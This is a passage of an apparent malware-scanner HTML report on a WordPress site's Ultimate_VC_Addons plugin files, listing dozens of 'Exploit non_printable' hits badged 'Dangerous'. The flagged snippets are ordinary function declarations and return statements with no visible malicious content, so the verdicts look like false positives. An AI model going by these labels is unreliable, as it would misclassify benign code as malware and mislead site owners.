<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_front_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">icon block</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 634</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_carousel_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function for </span><span style="color: #0000BB">button admin script</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 70</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_admin_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 76</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to intialize the carusole module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_carousel_addon</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 82</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 861</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">slider</span><span style="color: #007700">, </span><span style="color: #0000BB">i</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 862</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return \</span><span style="color: #DD0000">'<i type="button" ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$custom_dots </span><span style="color: #007700">. </span><span style="color: #DD0000">' class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_uc_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'dots_icon'</span><span style="color: #007700">] ) . </span><span style="color: #DD0000">'" data-role="none"></i>\';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 881</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function ($) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 882</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">"){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 888</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 895</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Animation Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 903</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_override_shortcodes' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 911</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_override_shortcodes</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_uc_settings </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_wrap_shortcode_in_div' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_wrap_shortcode_in_div</span><span style="color: #007700">( </span><span style="color: #0000BB">$attr</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">, </span><span style="color: #0000BB">$tag </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<div class="ult-item-wrap" data-animation="animated ' </span><span style="color: #007700">. </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$_shortcode_tags</span><span style="color: #007700">[</span><span style="color: #DD0000">'item_animation'</span><span style="color: #007700">] ) . </span><span style="color: #DD0000">'">' </span><span style="color: #007700">. </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">( </span><span style="color: #0000BB">$_shortcode_tags</span><span style="color: #007700">[ </span><span style="color: #0000BB">$tag </span><span style="color: #007700">], </span><span style="color: #0000BB">$attr</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">, </span><span style="color: #0000BB">$tag </span><span style="color: #007700">) . </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 948</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_restore_shortcodes' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_restore_shortcodes</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_466").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_icons.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.14 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_467" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Icons' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_icons </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Icons</span><span style="color: #007700">(); } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCodesContainer' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Ultimate_Icons' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Ulti</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Icons Block Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Icons Block module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Icons Block Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 328</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Icons Block Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 334</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_icons_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_icon_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Single Icon shortcode Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 357</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">single_icon_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_467").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_info_circle.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.57 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_468" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">add_info_circle</span><span style="color: #007700">() { if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$thumbnail_tab </span><span style="color: #007700">= </span><span style="color: #DD0000">'Thumbnail'</span><span style="color: #007700">; </span><span style="color: #0000BB">$information_tab </span><span style="color: #007700">= </span><span style="color: #DD0000">'Information Area'</span><span style="color: #007700">; </span><span style="color: #0000BB">$connector_tab </span><span style="color: #007700">= </span><span style="color: #DD0000">'Connector'</span><span style="color: #007700">; </span><span style="color: #0000BB">$reponsive_tab </span><span style="color: #007700">= </span><span style="color: #DD0000">'Responsive'</span><span style="color: #007700">; </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">'name' </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Info Circle'</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 281</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $output </span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 283</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">info_circle_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_info_circle_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_info_circle</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 386</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">info_circle</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_468").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Switch.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_469" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'Ultimate_VC_Addons_Switch_Param' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$ultimate_switch_param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_VC_Addons_Switch_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">checkbox_param</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 82</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
